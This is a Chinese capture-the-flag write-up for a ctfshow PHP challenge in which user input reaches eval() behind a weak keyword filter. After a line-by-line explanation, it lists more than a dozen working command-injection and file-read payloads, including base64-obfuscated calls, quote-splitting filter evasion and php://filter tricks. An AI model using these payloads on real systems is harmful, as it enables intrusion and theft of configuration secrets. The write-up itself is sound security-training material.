题目介绍:
ctfshow-萌新计划-web9-15
- <?php
- # flag in config.php
- include("config.php");
- if(isset($_GET['c'])){
- $c = $_GET['c'];
- if(preg_match("/system|exec|highlight/i",$c)){
- eval($c);
- }else{
- die("cmd error");
- }
- }else{
- highlight_file(__FILE__);
- }
- ?>
复制代码 题目分析:
- 包含设置文件:
- include("config.php");
- 这行代码包含了一个名为config.php的文件,该文件大概包含一些设置信息,比如flag。
- 检查GET参数c是否存在:
- if(isset($_GET['c'])){ ... }
- 这段代码检查是否有通过GET方法提交的c参数。
- 获取c参数的值:
- $c = $_GET['c'];
- 将GET参数c的值赋给变量$c。
- 正则表达式匹配:
- if(preg_match("/system|exec|highlight/i",$c)){ ... }
- 使用preg_match函数检查变量$c是否包含system、exec或highlight这些字符串(不区分巨细写)。这个正则表达式检查的目的是实行防止某些特定的命令执行函数被调用。
- 执行代码:
- eval($c);
- 假如正则表达式匹配成功,eval函数将执行变量$c中包含的PHP代码。这是一个非常伤害的操作,由于它允许执行任意PHP代码,大概导致严重的安全问题。
- 错误处理:
- die("cmd error");
- 假如正则表达式没有匹配,脚本将终止执行并输出错误信息。
- 高亮显示当前文件:
- highlight_file(__FILE__);
- 假如没有提交c参数,脚本将使用highlight_file函数显示当前脚本文件的源代码。
payload:
- ?c=system('cat config.php');
- ?c=system('tac config.php');
- ?c=show_source('config.php');
- ?c=passthru('tac config.php');
- ?c=passthru('more config.php');
- ?c=passthru('more confi***hp');
- ?c=passthru('tac con\fig*')?>
- ?c=passthru('c""at con""fig?ph""p')?>
- ?c=passthru("ca''t `ls`")?>
- ?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);
- ?c=$a=opendir('/var/www/html');$e=readdir($a);$e=readdir($a);$e=readdir($a);echo%20readfile($e);
- ?c= include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=config.php
- ?c=include $_GET[a];&a=php://filter/read=convert.base64-encode/resource=config.php
- ?a=cat config.php&c=echo`$_REQUEST[a]`;
- ……
复制代码 我不会接受我不要的未来,哪怕是掷中注定。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |